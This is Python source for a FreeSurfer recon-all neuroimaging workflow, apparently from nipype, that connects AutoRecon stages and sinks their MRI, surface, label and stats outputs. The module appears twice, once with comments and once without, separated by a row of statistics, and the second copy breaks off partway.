('T1_files', 'inputspec.T1_files'), ('T2_file', 'inputspec.T2_file'),
('FLAIR_file', 'inputspec.FLAIR_file'),
('num_threads', 'inputspec.num_threads'), ('cw256', 'inputspec.cw256')
]), (config_node, ar1_wf, [('reg_template_withskull',
'inputspec.reg_template_withskull'),
('awk_file', 'inputspec.awk_file')])])
# create AutoRecon2
ar2_wf, ar2_outputs = create_AutoRecon2(
plugin_args=plugin_args,
fsvernum=fsvernum,
stop=stop,
shrink=shrink,
distance=distance)
# connect inputs for AutoRecon2
reconall.connect(
[(inputspec, ar2_wf, [('num_threads', 'inputspec.num_threads')]),
(config_node, ar2_wf, [('reg_template_withskull',
'inputspec.reg_template_withskull'),
('reg_template', 'inputspec.reg_template')]),
(ar1_wf, ar2_wf, [('outputspec.brainmask', 'inputspec.brainmask'),
('outputspec.talairach', 'inputspec.transform'),
('outputspec.orig', 'inputspec.orig')])])
if fsvernum < 6:
reconall.connect([(ar1_wf, ar2_wf, [('outputspec.nu',
'inputspec.nu')])])
# create AutoRecon3
ar3_wf, ar3_outputs = create_AutoRecon3(
plugin_args=plugin_args,
th3=th3,
exvivo=exvivo,
entorhinal=entorhinal,
fsvernum=fsvernum)
# connect inputs for AutoRecon3
reconall.connect(
[(config_node, ar3_wf,
[('lh_atlas', 'inputspec.lh_atlas'),
('rh_atlas', 'inputspec.rh_atlas'), ('lh_classifier1',
'inputspec.lh_classifier1'),
('rh_classifier1',
'inputspec.rh_classifier1'), ('lh_classifier2',
'inputspec.lh_classifier2'),
('rh_classifier2',
'inputspec.rh_classifier2'), ('lh_classifier3',
'inputspec.lh_classifier3'),
('rh_classifier3',
'inputspec.rh_classifier3'), ('lookup_table',
'inputspec.lookup_table'),
('wm_lookup_table',
'inputspec.wm_lookup_table'), ('src_subject_dir',
'inputspec.src_subject_dir'),
('src_subject_id',
'inputspec.src_subject_id'), ('color_table',
'inputspec.color_table')]),
(ar1_wf, ar3_wf, [('outputspec.brainmask', 'inputspec.brainmask'),
('outputspec.talairach', 'inputspec.transform'),
('outputspec.orig',
'inputspec.orig_mgz'), ('outputspec.rawavg',
'inputspec.rawavg')]),
(ar2_wf, ar3_wf,
[('outputspec.aseg_presurf', 'inputspec.aseg_presurf'),
('outputspec.brain_finalsurfs',
'inputspec.brain_finalsurfs'), ('outputspec.wm', 'inputspec.wm'),
('outputspec.filled', 'inputspec.filled'), ('outputspec.norm',
'inputspec.norm')])])
for hemi in ('lh', 'rh'):
reconall.connect([(ar2_wf, ar3_wf,
[('outputspec.{0}_inflated'.format(hemi),
'inputspec.{0}_inflated'.format(hemi)),
('outputspec.{0}_smoothwm'.format(hemi),
'inputspec.{0}_smoothwm'.format(hemi)),
('outputspec.{0}_white'.format(hemi),
'inputspec.{0}_white'.format(hemi)),
('outputspec.{0}_cortex'.format(hemi),
'inputspec.{0}_cortex_label'.format(hemi)),
('outputspec.{0}_area'.format(hemi),
'inputspec.{0}_area'.format(hemi)),
('outputspec.{0}_curv'.format(hemi),
'inputspec.{0}_curv'.format(hemi)),
('outputspec.{0}_sulc'.format(hemi),
'inputspec.{0}_sulc'.format(hemi)),
('outputspec.{0}_orig_nofix'.format(hemi),
'inputspec.{0}_orig_nofix'.format(hemi)),
('outputspec.{0}_orig'.format(hemi),
'inputspec.{0}_orig'.format(hemi)),
('outputspec.{0}_white_H'.format(hemi),
'inputspec.{0}_white_H'.format(hemi)),
('outputspec.{0}_white_K'.format(hemi),
'inputspec.{0}_white_K'.format(hemi))])])
# Add more outputs to outputspec
outputs = ar1_outputs + ar2_outputs + ar3_outputs
outputspec = pe.Node(
niu.IdentityInterface(fields=outputs, mandatory_inputs=True),
name="outputspec")
for outfields, wf in [(ar1_outputs, ar1_wf), (ar2_outputs, ar2_wf),
(ar3_outputs, ar3_wf)]:
for field in outfields:
reconall.connect([(wf, outputspec, [('outputspec.' + field,
field)])])
# PreDataSink: Switch Transforms to datasinked transfrom
# The transforms in the header files of orig.mgz, orig_nu.mgz, and nu.mgz
# are all reference a transform in the cache directory. We need to rewrite the
# headers to reference the datasinked transform
# get the filepath to where the transform will be datasinked
def getDSTransformPath(subjects_dir, subject_id):
import os
transform = os.path.join(subjects_dir, subject_id, 'mri', 'transforms',
'talairach.xfm')
return transform
dstransform = pe.Node(
niu.Function(['subjects_dir', 'subject_id'], ['transform'],
getDSTransformPath),
name="PreDataSink_GetTransformPath")
reconall.connect([(inputspec, dstransform,
[('subjects_dir', 'subjects_dir'), ('subject_id',
'subject_id')])])
# add the data sink transfrom location to the headers
predatasink_orig = pe.Node(AddXFormToHeader(), name="PreDataSink_Orig")
predatasink_orig.inputs.copy_name = True
predatasink_orig.inputs.out_file = 'orig.mgz'
reconall.connect([(outputspec, predatasink_orig, [('orig', 'in_file')]),
(dstransform, predatasink_orig, [('transform',
'transform')])])
predatasink_orig_nu = pe.Node(
AddXFormToHeader(), name="PreDataSink_Orig_Nu")
predatasink_orig_nu.inputs.copy_name = True
predatasink_orig_nu.inputs.out_file = 'orig_nu.mgz'
reconall.connect(
[(outputspec, predatasink_orig_nu, [('orig_nu', 'in_file')]),
(dstransform, predatasink_orig_nu, [('transform', 'transform')])])
predatasink_nu = pe.Node(AddXFormToHeader(), name="PreDataSink_Nu")
predatasink_nu.inputs.copy_name = True
predatasink_nu.inputs.out_file = 'nu.mgz'
reconall.connect([(outputspec, predatasink_nu, [('nu', 'in_file')]),
(dstransform, predatasink_nu, [('transform',
'transform')])])
# Datasink outputs
datasink = pe.Node(DataSink(), name="DataSink")
datasink.inputs.parameterization = False
reconall.connect([(inputspec, datasink,
[('subjects_dir', 'base_directory'), ('subject_id',
'container')])])
# assign datasink inputs
reconall.connect([
(predatasink_orig, datasink, [('out_file', 'mri.@orig')]),
(predatasink_orig_nu, datasink, [('out_file', 'mri.@orig_nu')]),
(predatasink_nu, datasink, [('out_file', 'mri.@nu')]),
(outputspec, datasink, [
('origvols', 'mri.orig'),
('t2_raw', 'mri.orig.@t2raw'),
('flair', 'mri.orig.@flair'),
('rawavg', 'mri.@rawavg'),
('talairach_auto', 'mri.transforms.@tal_auto'),
('talairach', 'mri.transforms.@tal'),
('t1', 'mri.@t1'),
('brainmask_auto', 'mri.@brainmask_auto'),
('brainmask', 'mri.@brainmask'),
('braintemplate', 'mri.@braintemplate'),
('tal_lta', 'mri.transforms.@tal_lta'),
('norm', 'mri.@norm'),
('ctrl_pts', 'mri.@ctrl_pts'),
('tal_m3z', 'mri.transforms.@tal_m3z'),
('nu_noneck', 'mri.@nu_noneck'),
('talskull2', 'mri.transforms.@talskull2'),
('aseg_noCC', 'mri.@aseg_noCC'),
('cc_up', 'mri.transforms.@cc_up'),
('aseg_auto', 'mri.@aseg_auto'),
('aseg_presurf', 'mri.@aseg_presuf'),
('brain', 'mri.@brain'),
('brain_finalsurfs', 'mri.@brain_finalsurfs'),
('wm_seg', 'mri.@wm_seg'),
('wm_aseg', 'mri.@wm_aseg'),
('wm', 'mri.@wm'),
('filled', 'mri.@filled'),
('ponscc_log', 'mri.@ponscc_log'),
('lh_orig_nofix', 'surf.@lh_orig_nofix'),
('lh_orig', 'surf.@lh_orig'),
('lh_smoothwm_nofix', 'surf.@lh_smoothwm_nofix'),
('lh_inflated_nofix', 'surf.@lh_inflated_nofix'),
('lh_qsphere_nofix', 'surf.@lh_qsphere_nofix'),
('lh_white', 'surf.@lh_white'),
('lh_curv', 'surf.@lh_curv'),
('lh_area', 'surf.@lh_area'),
('lh_cortex', 'label.@lh_cortex'),
('lh_smoothwm', 'surf.@lh_smoothwm'),
('lh_sulc', 'surf.@lh_sulc'),
('lh_inflated', 'surf.@lh_inflated'),
('lh_white_H', 'surf.@lh_white_H'),
('lh_white_K', 'surf.@lh_white_K'),
('lh_inflated_H', 'surf.@lh_inflated_H'),
('lh_inflated_K', 'surf.@lh_inflated_K'),
('lh_curv_stats', 'stats.@lh_curv_stats'),
('rh_orig_nofix', 'surf.@rh_orig_nofix'),
('rh_orig', 'surf.@rh_orig'),
('rh_smoothwm_nofix', 'surf.@rh_smoothwm_nofix'),
('rh_inflated_nofix', 'surf.@rh_inflated_nofix'),
('rh_qsphere_nofix', 'surf.@rh_qsphere_nofix'),
('rh_white', 'surf.@rh_white'),
('rh_curv', 'surf.@rh_curv'),
('rh_area', 'surf.@rh_area'),
('rh_cortex', 'label.@rh_cortex'),
('rh_smoothwm', 'surf.@rh_smoothwm'),
('rh_sulc', 'surf.@rh_sulc'),
('rh_inflated', 'surf.@rh_inflated'),
('rh_white_H', 'surf.@rh_white_H'),
('rh_white_K', 'surf.@rh_white_K'),
('rh_inflated_H', 'surf.@rh_inflated_H'),
('rh_inflated_K', 'surf.@rh_inflated_K'),
('rh_curv_stats', 'stats.@rh_curv_stats'),
('lh_aparc_annot_ctab', 'label.@aparc_annot_ctab'),
('aseg', 'mri.@aseg'),
('wmparc', 'mri.@wmparc'),
('wmparc_stats', 'stats.@wmparc_stats'),
('aseg_stats', 'stats.@aseg_stats'),
('aparc_a2009s_aseg', 'mri.@aparc_a2009s_aseg'),
('aparc_aseg', 'mri.@aparc_aseg'),
('aseg_presurf_hypos', 'mri.@aseg_presurf_hypos'),
('ribbon', 'mri.@ribbon'),
('rh_ribbon', 'mri.@rh_ribbon'),
('lh_ribbon', 'mri.@lh_ribbon'),
('lh_sphere', 'surf.@lh_sphere'),
('rh_sphere', 'surf.@rh_sphere'),
('lh_sphere_reg', 'surf.@lh_sphere_reg'),
('rh_sphere_reg', 'surf.@rh_sphere_reg'),
('lh_jacobian_white', 'surf.@lh_jacobian_white'),
('rh_jacobian_white', 'surf.@rh_jacobian_white'),
('lh_avg_curv', 'surf.@lh_avg_curv'),
('rh_avg_curv', 'surf.@rh_avg_curv'),
('lh_aparc_annot', 'label.@lh_aparc_annot'),
('rh_aparc_annot', 'label.@rh_aparc_annot'),
('lh_area_pial', 'surf.@lh_area_pial'),
('rh_area_pial', 'surf.@rh_area_pial'),
('lh_curv_pial', 'surf.@lh_curv_pial'),
('rh_curv_pial', 'surf.@rh_curv_pial'),
('lh_pial', 'surf.@lh_pial'),
('rh_pial', 'surf.@rh_pial'),
('lh_thickness_pial', 'surf.@lh_thickness_pial'),
('rh_thickness_pial', 'surf.@rh_thickness_pial'),
('lh_area_mid', 'surf.@lh_area_mid'),
('rh_area_mid', 'surf.@rh_area_mid'),
('lh_volume', 'surf.@lh_volume'),
('rh_volume', 'surf.@rh_volume'),
('lh_aparc_annot_ctab', 'label.@lh_aparc_annot_ctab'),
('rh_aparc_annot_ctab', 'label.@rh_aparc_annot_ctab'),
('lh_aparc_stats', 'stats.@lh_aparc_stats'),
('rh_aparc_stats', 'stats.@rh_aparc_stats'),
('lh_aparc_pial_stats', 'stats.@lh_aparc_pial_stats'),
('rh_aparc_pial_stats', 'stats.@rh_aparc_pial_stats'),
('lh_aparc_a2009s_annot', 'label.@lh_aparc_a2009s_annot'),
('rh_aparc_a2009s_annot', 'label.@rh_aparc_a2009s_annot'),
('lh_aparc_a2009s_annot_ctab',
'label.@lh_aparc_a2009s_annot_ctab'),
('rh_aparc_a2009s_annot_ctab',
'label.@rh_aparc_a2009s_annot_ctab'),
('lh_aparc_a2009s_annot_stats',
'stats.@lh_aparc_a2009s_annot_stats'),
('rh_aparc_a2009s_annot_stats',
'stats.@rh_aparc_a2009s_annot_stats'),
('lh_aparc_DKTatlas40_annot', 'label.@lh_aparc_DKTatlas40_annot'),
('rh_aparc_DKTatlas40_annot', 'label.@rh_aparc_DKTatlas40_annot'),
('lh_aparc_DKTatlas40_annot_ctab',
'label.@lh_aparc_DKTatlas40_annot_ctab'),
('rh_aparc_DKTatlas40_annot_ctab',
'label.@rh_aparc_DKTatlas40_annot_ctab'),
('lh_aparc_DKTatlas40_annot_stats',
'stats.@lh_aparc_DKTatlas40_annot_stats'),
('rh_aparc_DKTatlas40_annot_stats',
'stats.@rh_aparc_DKTatlas40_annot_stats'),
('lh_wg_pct_mgh', 'surf.@lh_wg_pct_mgh'),
('rh_wg_pct_mgh', 'surf.@rh_wg_pct_mgh'),
('lh_wg_pct_stats', 'stats.@lh_wg_pct_stats'),
('rh_wg_pct_stats', 'stats.@rh_wg_pct_stats'),
('lh_pctsurfcon_log', 'log.@lh_pctsurfcon_log'),
('rh_pctsurfcon_log', 'log.@rh_pctsurfcon_log'),
('lh_BAMaps_stats', 'stats.@lh_BAMaps_stats'),
('lh_color', 'label.@lh_color'),
('lh_thresh_BAMaps_stats', 'stats.@lh_thresh_BAMaps_stats'),
('lh_thresh_color', 'label.@lh_thresh_color'),
('rh_BAMaps_stats', 'stats.@rh_BAMaps_stats'),
('rh_color', 'label.@rh_color'),
('rh_thresh_BAMaps_stats', 'stats.@rh_thresh_BAMaps_stats'),
('rh_thresh_color', 'label.@rh_thresh_color'),
('lh_BAMaps_labels', 'label.@lh_BAMaps_labels'),
('lh_thresh_BAMaps_labels', 'label.@lh_thresh_BAMaps_labels'),
('rh_BAMaps_labels', 'label.@rh_BAMaps_labels'),
('rh_thresh_BAMaps_labels', 'label.@rh_thresh_BAMaps_labels'),
('lh_BAMaps_annotation', 'label.@lh_BAMaps_annotation'),
('lh_thresh_BAMaps_annotation',
'label.@lh_thresh_BAMaps_annotation'),
('rh_BAMaps_annotation', 'label.@rh_BAMaps_annotation'),
('rh_thresh_BAMaps_annotation',
'label.@rh_thresh_BAMaps_annotation'),
]),
])
# compeltion node
# since recon-all outputs so many files a completion node is added
# that will output the subject_id once the workflow has completed
def completemethod(datasinked_files, subject_id):
print("recon-all has finished executing for subject: {0}".format(
subject_id))
return subject_id
completion = pe.Node(
niu.Function(['datasinked_files', 'subject_id'], ['subject_id'],
completemethod),
name="Completion")
# create a special identity interface for outputing the subject_id
postds_outputspec = pe.Node(
niu.IdentityInterface(['subject_id']), name="postdatasink_outputspec")
reconall.connect(
[(datasink, completion, [('out_file', 'datasinked_files')]),
(inputspec, completion, [('subject_id', 'subject_id')]),
(completion, postds_outputspec, [('subject_id', 'subject_id')])])
return reconall
| 46.803306 | 110 | 0.583945 |
from __future__ import (print_function, division, unicode_literals,
absolute_import)
from ....pipeline import engine as pe
from ....interfaces import freesurfer as fs
from ....interfaces import utility as niu
from .autorecon1 import create_AutoRecon1
from .autorecon2 import create_AutoRecon2
from .autorecon3 import create_AutoRecon3
from ....interfaces.freesurfer import AddXFormToHeader, Info
from ....interfaces.io import DataSink
from .utils import getdefaultconfig
from .... import logging
logger = logging.getLogger('nipype.workflow')
def create_skullstripped_recon_flow(name="skullstripped_recon_all"):
wf = pe.Workflow(name=name)
inputnode = pe.Node(
niu.IdentityInterface(
fields=['subject_id', 'subjects_dir', 'T1_files']),
name='inputspec')
autorecon1 = pe.Node(fs.ReconAll(), name="autorecon1")
autorecon1.plugin_args = {'submit_specs': 'request_memory = 2500'}
autorecon1.inputs.directive = "autorecon1"
autorecon1.inputs.args = "-noskullstrip"
autorecon1._interface._can_resume = False
wf.connect(inputnode, "T1_files", autorecon1, "T1_files")
wf.connect(inputnode, "subjects_dir", autorecon1, "subjects_dir")
wf.connect(inputnode, "subject_id", autorecon1, "subject_id")
def link_masks(subjects_dir, subject_id):
import os
os.symlink(
os.path.join(subjects_dir, subject_id, "mri", "T1.mgz"),
os.path.join(subjects_dir, subject_id, "mri",
"brainmask.auto.mgz"))
os.symlink(
os.path.join(subjects_dir, subject_id, "mri",
"brainmask.auto.mgz"),
os.path.join(subjects_dir, subject_id, "mri", "brainmask.mgz"))
return subjects_dir, subject_id
masks = pe.Node(
niu.Function(
input_names=['subjects_dir', 'subject_id'],
output_names=['subjects_dir', 'subject_id'],
function=link_masks),
name="link_masks")
wf.connect(autorecon1, "subjects_dir", masks, "subjects_dir")
wf.connect(autorecon1, "subject_id", masks, "subject_id")
autorecon_resume = pe.Node(fs.ReconAll(), name="autorecon_resume")
autorecon_resume.plugin_args = {'submit_specs': 'request_memory = 2500'}
autorecon_resume.inputs.args = "-no-isrunning"
wf.connect(masks, "subjects_dir", autorecon_resume, "subjects_dir")
wf.connect(masks, "subject_id", autorecon_resume, "subject_id")
outputnode = pe.Node(
niu.IdentityInterface(fields=['subject_id', 'subjects_dir']),
name='outputspec')
wf.connect(autorecon_resume, "subjects_dir", outputnode, "subjects_dir")
wf.connect(autorecon_resume, "subject_id", outputnode, "subject_id")
return wf
def create_reconall_workflow(name="ReconAll", plugin_args=None):
reconall = pe.Workflow(name=name)
inputspec = pe.Node(
niu.IdentityInterface(fields=[
'subject_id', 'subjects_dir', 'T1_files', 'T2_file', 'FLAIR_file',
'num_threads', 'cw256', 'reg_template', 'reg_template_withskull',
'lh_atlas', 'rh_atlas', 'lh_classifier1', 'rh_classifier1',
'lh_classifier2', 'rh_classifier2', 'lh_classifier3',
'rh_classifier3', 'lookup_table', 'wm_lookup_table',
'src_subject_id', 'src_subject_dir', 'color_table', 'awk_file'
]),
run_without_submitting=True,
name='inputspec')
fs_version_full = Info.version()
if fs_version_full and ('v6.0' in fs_version_full
or 'dev' in fs_version_full):
fsvernum = 6.0
fs_version = 'v6.0'
th3 = True
shrink = 2
distance = 200
stop = 0.0001
exvivo = True
entorhinal = True
rb_date = "2014-08-21"
else:
fsvernum = 5.3
if fs_version_full:
if 'v5.3' in fs_version_full:
fs_version = 'v5.3'
else:
fs_version = fs_version_full.split('-')[-1]
logger.info(("Warning: Workflow may not work properly if "
"FREESURFER_HOME environmental variable is not "
"set or if you are using an older version of "
"FreeSurfer"))
else:
fs_version = 5.3
th3 = False
shrink = None
distance = 50
stop = None
exvivo = False
entorhinal = False
rb_date = "2008-03-26"
logger.info("FreeSurfer Version: {0}".format(fs_version))
def setconfig(reg_template=None,
reg_template_withskull=None,
lh_atlas=None,
rh_atlas=None,
lh_classifier1=None,
rh_classifier1=None,
lh_classifier2=None,
rh_classifier2=None,
lh_classifier3=None,
rh_classifier3=None,
src_subject_id=None,
src_subject_dir=None,
color_table=None,
lookup_table=None,
wm_lookup_table=None,
awk_file=None,
rb_date=None):
def checkarg(arg, default):
if arg:
return arg
else:
return default
defaultconfig = getdefaultconfig(exitonfail=True, rb_date=rb_date)
reg_template = checkarg(reg_template,
defaultconfig['registration_template'])
reg_template_withskull = checkarg(
reg_template_withskull,
defaultconfig['registration_template_withskull'])
lh_atlas = checkarg(lh_atlas, defaultconfig['lh_atlas'])
rh_atlas = checkarg(rh_atlas, defaultconfig['rh_atlas'])
lh_classifier1 = checkarg(lh_classifier1,
defaultconfig['lh_classifier'])
rh_classifier1 = checkarg(rh_classifier1,
defaultconfig['rh_classifier'])
lh_classifier2 = checkarg(lh_classifier2,
defaultconfig['lh_classifier2'])
rh_classifier2 = checkarg(rh_classifier2,
defaultconfig['rh_classifier2'])
lh_classifier3 = checkarg(lh_classifier3,
defaultconfig['lh_classifier3'])
rh_classifier3 = checkarg(rh_classifier3,
defaultconfig['rh_classifier3'])
src_subject_id = checkarg(src_subject_id,
defaultconfig['src_subject_id'])
src_subject_dir = checkarg(src_subject_dir,
defaultconfig['src_subject_dir'])
color_table = checkarg(color_table, defaultconfig['AvgColorTable'])
lookup_table = checkarg(lookup_table, defaultconfig['LookUpTable'])
wm_lookup_table = checkarg(wm_lookup_table,
defaultconfig['WMLookUpTable'])
awk_file = checkarg(awk_file, defaultconfig['awk_file'])
return reg_template, reg_template_withskull, lh_atlas, rh_atlas, \
lh_classifier1, rh_classifier1, lh_classifier2, rh_classifier2, \
lh_classifier3, rh_classifier3, src_subject_id, src_subject_dir, \
color_table, lookup_table, wm_lookup_table, awk_file
params = [
'reg_template', 'reg_template_withskull', 'lh_atlas', 'rh_atlas',
'lh_classifier1', 'rh_classifier1', 'lh_classifier2', 'rh_classifier2',
'lh_classifier3', 'rh_classifier3', 'src_subject_id',
'src_subject_dir', 'color_table', 'lookup_table', 'wm_lookup_table',
'awk_file'
]
config_node = pe.Node(
niu.Function(params + ['rb_date'], params, setconfig), name="config")
config_node.inputs.rb_date = rb_date
for param in params:
reconall.connect(inputspec, param, config_node, param)
ar1_wf, ar1_outputs = create_AutoRecon1(
plugin_args=plugin_args,
stop=stop,
distance=distance,
shrink=shrink,
fsvernum=fsvernum)
reconall.connect([(inputspec, ar1_wf, [
('T1_files', 'inputspec.T1_files'), ('T2_file', 'inputspec.T2_file'),
('FLAIR_file', 'inputspec.FLAIR_file'),
('num_threads', 'inputspec.num_threads'), ('cw256', 'inputspec.cw256')
]), (config_node, ar1_wf, [('reg_template_withskull',
'inputspec.reg_template_withskull'),
('awk_file', 'inputspec.awk_file')])])
ar2_wf, ar2_outputs = create_AutoRecon2(
plugin_args=plugin_args,
fsvernum=fsvernum,
stop=stop,
shrink=shrink,
distance=distance)
reconall.connect(
[(inputspec, ar2_wf, [('num_threads', 'inputspec.num_threads')]),
(config_node, ar2_wf, [('reg_template_withskull',
'inputspec.reg_template_withskull'),
('reg_template', 'inputspec.reg_template')]),
(ar1_wf, ar2_wf, [('outputspec.brainmask', 'inputspec.brainmask'),
('outputspec.talairach', 'inputspec.transform'),
('outputspec.orig', 'inputspec.orig')])])
if fsvernum < 6:
reconall.connect([(ar1_wf, ar2_wf, [('outputspec.nu',
'inputspec.nu')])])
ar3_wf, ar3_outputs = create_AutoRecon3(
plugin_args=plugin_args,
th3=th3,
exvivo=exvivo,
entorhinal=entorhinal,
fsvernum=fsvernum)
reconall.connect(
[(config_node, ar3_wf,
[('lh_atlas', 'inputspec.lh_atlas'),
('rh_atlas', 'inputspec.rh_atlas'), ('lh_classifier1',
'inputspec.lh_classifier1'),
('rh_classifier1',
'inputspec.rh_classifier1'), ('lh_classifier2',
'inputspec.lh_classifier2'),
('rh_classifier2',
'inputspec.rh_classifier2'), ('lh_classifier3',
'inputspec.lh_classifier3'),
('rh_classifier3',
'inputspec.rh_classifier3'), ('lookup_table',
'inputspec.lookup_table'),
('wm_lookup_table',
'inputspec.wm_lookup_table'), ('src_subject_dir',
'inputspec.src_subject_dir'),
('src_subject_id',
'inputspec.src_subject_id'), ('color_table',
'inputspec.color_table')]),
(ar1_wf, ar3_wf, [('outputspec.brainmask', 'inputspec.brainmask'),
('outputspec.talairach', 'inputspec.transform'),
('outputspec.orig',
'inputspec.orig_mgz'), ('outputspec.rawavg',
'inputspec.rawavg')]),
(ar2_wf, ar3_wf,
[('outputspec.aseg_presurf', 'inputspec.aseg_presurf'),
('outputspec.brain_finalsurfs',
'inputspec.brain_finalsurfs'), ('outputspec.wm', 'inputspec.wm'),
('outputspec.filled', 'inputspec.filled'), ('outputspec.norm',
'inputspec.norm')])])
for hemi in ('lh', 'rh'):
reconall.connect([(ar2_wf, ar3_wf,
[('outputspec.{0}_inflated'.format(hemi),
'inputspec.{0}_inflated'.format(hemi)),
('outputspec.{0}_smoothwm'.format(hemi),
'inputspec.{0}_smoothwm'.format(hemi)),
('outputspec.{0}_white'.format(hemi),
'inputspec.{0}_white'.format(hemi)),
('outputspec.{0}_cortex'.format(hemi),
'inputspec.{0}_cortex_label'.format(hemi)),
('outputspec.{0}_area'.format(hemi),
'inputspec.{0}_area'.format(hemi)),
('outputspec.{0}_curv'.format(hemi),
'inputspec.{0}_curv'.format(hemi)),
('outputspec.{0}_sulc'.format(hemi),
'inputspec.{0}_sulc'.format(hemi)),
('outputspec.{0}_orig_nofix'.format(hemi),
'inputspec.{0}_orig_nofix'.format(hemi)),
('outputspec.{0}_orig'.format(hemi),
'inputspec.{0}_orig'.format(hemi)),
('outputspec.{0}_white_H'.format(hemi),
'inputspec.{0}_white_H'.format(hemi)),
('outputspec.{0}_white_K'.format(hemi),
'inputspec.{0}_white_K'.format(hemi))])])
outputs = ar1_outputs + ar2_outputs + ar3_outputs
outputspec = pe.Node(
niu.IdentityInterface(fields=outputs, mandatory_inputs=True),
name="outputspec")
for outfields, wf in [(ar1_outputs, ar1_wf), (ar2_outputs, ar2_wf),
(ar3_outputs, ar3_wf)]:
for field in outfields:
reconall.connect([(wf, outputspec, [('outputspec.' + field,
field)])])
def getDSTransformPath(subjects_dir, subject_id):
import os
transform = os.path.join(subjects_dir, subject_id, 'mri', 'transforms',
'talairach.xfm')
return transform
dstransform = pe.Node(
niu.Function(['subjects_dir', 'subject_id'], ['transform'],
getDSTransformPath),
name="PreDataSink_GetTransformPath")
reconall.connect([(inputspec, dstransform,
[('subjects_dir', 'subjects_dir'), ('subject_id',
'subject_id')])])
predatasink_orig = pe.Node(AddXFormToHeader(), name="PreDataSink_Orig")
predatasink_orig.inputs.copy_name = True
predatasink_orig.inputs.out_file = 'orig.mgz'
reconall.connect([(outputspec, predatasink_orig, [('orig', 'in_file')]),
(dstransform, predatasink_orig, [('transform',
'transform')])])
predatasink_orig_nu = pe.Node(
AddXFormToHeader(), name="PreDataSink_Orig_Nu")
predatasink_orig_nu.inputs.copy_name = True
predatasink_orig_nu.inputs.out_file = 'orig_nu.mgz'
reconall.connect(
[(outputspec, predatasink_orig_nu, [('orig_nu', 'in_file')]),
(dstransform, predatasink_orig_nu, [('transform', 'transform')])])
predatasink_nu = pe.Node(AddXFormToHeader(), name="PreDataSink_Nu")
predatasink_nu.inputs.copy_name = True
predatasink_nu.inputs.out_file = 'nu.mgz'
reconall.connect([(outputspec, predatasink_nu, [('nu', 'in_file')]),
(dstransform, predatasink_nu, [('transform',
'transform')])])
datasink = pe.Node(DataSink(), name="DataSink")
datasink.inputs.parameterization = False
reconall.connect([(inputspec, datasink,
[('subjects_dir', 'base_directory'), ('subject_id',
'container')])])
reconall.connect([
(predatasink_orig, datasink, [('out_file', 'mri.@orig')]),
(predatasink_orig_nu, datasink, [('out_file', 'mri.@orig_nu')]),
(predatasink_nu, datasink, [('out_file', 'mri.@nu')]),
(outputspec, datasink, [
('origvols', 'mri.orig'),
('t2_raw', 'mri.orig.@t2raw'),
('flair', 'mri.orig.@flair'),
('rawavg', 'mri.@rawavg'),
('talairach_auto', 'mri.transforms.@tal_auto'),
('talairach', 'mri.transforms.@tal'),
('t1', 'mri.@t1'),
('brainmask_auto', 'mri.@brainmask_auto'),
('brainmask', 'mri.@brainmask'),
('braintemplate', 'mri.@braintemplate'),
('tal_lta', 'mri.transforms.@tal_lta'),
('norm', 'mri.@norm'),
('ctrl_pts', 'mri.@ctrl_pts'),
('tal_m3z', 'mri.transforms.@tal_m3z'),
('nu_noneck', 'mri.@nu_noneck'),
('talskull2', 'mri.transforms.@talskull2'),
('aseg_noCC', 'mri.@aseg_noCC'),
('cc_up', 'mri.transforms.@cc_up'),
('aseg_auto', 'mri.@aseg_auto'),
('aseg_presurf', 'mri.@aseg_presuf'),
('brain', 'mri.@brain'),
('brain_finalsurfs', 'mri.@brain_finalsurfs'),
('wm_seg', 'mri.@wm_seg'),
('wm_aseg', 'mri.@wm_aseg'),
('wm', 'mri.@wm'),
('filled', 'mri.@filled'),
('ponscc_log', 'mri.@ponscc_log'),
('lh_orig_nofix', 'surf.@lh_orig_nofix'),
('lh_orig', 'surf.@lh_orig'),
('lh_smoothwm_nofix', 'surf.@lh_smoothwm_nofix'),
('lh_inflated_nofix', 'surf.@lh_inflated_nofix'),
('lh_qsphere_nofix', 'surf.@lh_qsphere_nofix'),
('lh_white', 'surf.@lh_white'),
('lh_curv', 'surf.@lh_curv'),
('lh_area', 'surf.@lh_area'),
('lh_cortex', 'label.@lh_cortex'),
('lh_smoothwm', 'surf.@lh_smoothwm'),
('lh_sulc', 'surf.@lh_sulc'),
('lh_inflated', 'surf.@lh_inflated'),
('lh_white_H', 'surf.@lh_white_H'),
('lh_white_K', 'surf.@lh_white_K'),
('lh_inflated_H', 'surf.@lh_inflated_H'),
('lh_inflated_K', 'surf.@lh_inflated_K'),
('lh_curv_stats', 'stats.@lh_curv_stats'),
('rh_orig_nofix', 'surf.@rh_orig_nofix'),
('rh_orig', 'surf.@rh_orig'),
('rh_smoothwm_nofix', 'surf.@rh_smoothwm_nofix'),
('rh_inflated_nofix', 'surf.@rh_inflated_nofix'),
('rh_qsphere_nofix', 'surf.@rh_qsphere_nofix'),
('rh_white', 'surf.@rh_white'),
('rh_curv', 'surf.@rh_curv'),
('rh_area', 'surf.@rh_area'),
('rh_cortex', 'label.@rh_cortex'),
('rh_smoothwm', 'surf.@rh_smoothwm'),
('rh_sulc', 'surf.@rh_sulc'),
('rh_inflated', 'surf.@rh_inflated'),
('rh_white_H', 'surf.@rh_white_H'),
('rh_white_K', 'surf.@rh_white_K'),
('rh_inflated_H', 'surf.@rh_inflated_H'),
('rh_inflated_K', 'surf.@rh_inflated_K'),
('rh_curv_stats', 'stats.@rh_curv_stats'),
('lh_aparc_annot_ctab', 'label.@aparc_annot_ctab'),
('aseg', 'mri.@aseg'),
('wmparc', 'mri.@wmparc'),
('wmparc_stats', 'stats.@wmparc_stats'),
('aseg_stats', 'stats.@aseg_stats'),
('aparc_a2009s_aseg', 'mri.@aparc_a2009s_aseg'),
('aparc_aseg', 'mri.@aparc_aseg'),
('aseg_presurf_hypos', 'mri.@aseg_presurf_hypos'),
('ribbon', 'mri.@ribbon'),
('rh_ribbon', 'mri.@rh_ribbon'),
('lh_ribbon', 'mri.@lh_ribbon'),
('lh_sphere', 'surf.@lh_sphere'),
('rh_sphere', 'surf.@rh_sphere'),
('lh_sphere_reg', 'surf.@lh_sphere_reg'),
('rh_sphere_reg', 'surf.@rh_sphere_reg'),
('lh_jacobian_white', 'surf.@lh_jacobian_white'),
('rh_jacobian_white', 'surf.@rh_jacobian_white'),
('lh_avg_curv', 'surf.@lh_avg_curv'),
('rh_avg_curv', 'surf.@rh_avg_curv'),
('lh_aparc_annot', 'label.@lh_aparc_annot'),
('rh_aparc_annot', 'label.@rh_aparc_annot'),
('lh_area_pial', 'surf.@lh_area_pial'),
('rh_area_pial', 'surf.@rh_area_pial'),
